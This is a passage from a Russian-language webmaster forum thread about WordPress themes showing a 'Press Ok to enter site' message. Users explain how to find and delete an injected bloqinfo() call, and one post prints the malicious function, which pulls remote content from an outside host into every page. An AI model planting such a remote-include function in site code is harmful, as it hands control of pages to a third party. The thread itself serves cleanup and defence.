Press Ok to enter site. Откуда?

(Ответов: 13, Просмотров: 2562)
Страница 2 из 2 Первая 12
  1. Студент Аватар для VictorDmitriev
    • Регистрация: 03.02.2011
    • Сообщений: 66
    • Репутация: 5
    Ура! Все заработало.

    Кидаю ссылку, где все подробно разжевано http://madinski.org.ua/archives/2568!

    У себя этот код <?=bloqinfo($post->ID) ?> нашел в файле index.php
    Удачи.
    • 0
  2. Новичок
    • Регистрация: 29.07.2011
    • Сообщений: 6
    • Репутация: 0
    для начала:
    в single.php
    вместо
    <div class="post" id="post-<?php the_ID(); ?>"><?=bloqinfo($post->ID) ?>
    оставляем

    <div class="post">
    это приводит сайт в рабочее состояние

    ---------- Сообщение добавлено 18:52 ---------- Предыдущее 18:51 ----------

    и потом читаем полное устрание _http://xarkiv.com/index.php?threads/press-ok-to-enter-site-wordpress-%D0%9F%D1%80%D0%BE%D0%B1%D0%BB%D0%B5%D0%BC%D0%B0.9 02/

    ---------- Сообщение добавлено 18:53 ---------- Предыдущее 18:52 ----------

    Дмитриев опередил :)
    • 0
  3. Гуру Аватар для Movut
    • Регистрация: 03.09.2009
    • Сообщений: 511
    • Репутация: 290
    • Webmoney BL: ?
    Тоже столкнулся с подобной проблемой. А что это даёт тому, кто подобную фигню в шаблон прописал, кто подскажет?
    • 0
  4. Студент Аватар для FaNiska
    • Регистрация: 29.09.2011
    • Сообщений: 31
    • Репутация: 1
    single.php. Заходим в этот файл и ищем там сей код:
    Код:
    <?=bloqinfo($post->ID) ?>
    Далее ищем эту функцию bloqinfo(…) если её описания нет в файле single.php, тогда отправляемся искать в functions.php либо же pagefunctions.php, код функции должен выглядеть так:
    Код:
    function bloqinfo($wp_id){
     static $wp_count = 0;
     if($wp_count == 0){
     $wp_count++;
     return @file_get_contents('http://wpru.ru/aksimet.php?id='.$wp_id.'&m=06');
     }
    }
    Смело удаляете его и всё – сообщение должно пропасть.

    И еще. Обновите wordpress до последней версии. Такая трабла у тех, кто не обновился. На днях столкнулся с этим "чудом". Решение проблемы скопировал отсюда
    http://stafox.ru/press-ok-to-enter-site-xak-wordpress/
    • 0
Страница 2 из 2 Первая 12

Похожие темы

Темы Раздел Ответов Последний пост
Джумла.УРЛ вида site.ru/index.php/categoriya
Web программирование 6 18.09.2011 14:19
Есть ли аналог Site -Auditor?
Софт, скрипты, сервисы 13 23.10.2009 00:03
GA. Referring Site
Софт, скрипты, сервисы 8 09.09.2009 16:44

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры